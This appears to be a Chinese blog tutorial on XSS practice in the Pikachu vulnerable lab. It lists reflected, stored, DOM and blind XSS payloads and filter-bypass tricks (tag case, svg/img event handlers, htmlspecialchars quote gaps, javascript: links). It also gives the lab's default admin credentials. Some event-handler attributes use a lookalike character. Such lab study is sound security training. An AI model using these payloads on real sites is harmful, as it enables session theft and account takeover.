1.搭建pikachu靶场,pikachu使用世界上最好的语言PHP进行开发,数据库使用的是mysql,因此运行pikachu需要提前安装好"PHP+MYSQL+中间件(如apache,nginx等)的基础环境,建议可以直接使用phpstudy即可。
2.反射型xss练习
因为长度受限制。可以右键点击检测,定位输入框将maxlength设置大一些。反射型只能运行一次。
chifan'"><script>alert('shuijiaodadoudou')</script>
成功执行
3.存储型xss练习
存储型因为它保存在数据库中,因为每次都会执行。
chifan'"><script>alert('shuijiaodadoudou')</script>
4.DOM型xss练习
它不与后端服务器做交互,属于前端dom节点。
chifan'"><a href="#" οnclick="alert('dadoudou')">dianjiwo</a>
5.xss盲打练习
chifan'"><script>alert('shuijiaodadoudou')</script>
登录后台查看 admin 123456
6.xss一些绕过方式
6.1 标签大小写绕过
chifan'"><sCRipt>alert('shuijiao')</sCRipt>
6.2 换一个标签绕过
chifan'"><svg </onload = "1 (_=alert,_('shuijiao'))"">
6.3 事件标签绕过
<img src="#" οnerrοr="alert('chifan')"/>
6.4 html编码绕过
<img src="#" οnerrοr="alert('chifan')"/>
6.5 htmlspecialchars绕过
-
ENT_COMPAT 仅仅编码双引号;
-
ENT_QUOTES 单引号、双引号都编码;
-
ENT_NOQUOTES 不编码任何引号;
双引号被过滤
chifan' οnclick='alert(123)'
单双引号都被过滤
javascript:alert(123)
6.6 href绕过
javascript:alert(123)
6.7 js输出绕过
类似于sql注入
chifan'</script>shuijiao'"><script>alert('dadoudou')</script>
7.如果分享的内容让你感兴趣,也麻烦点个关注呢。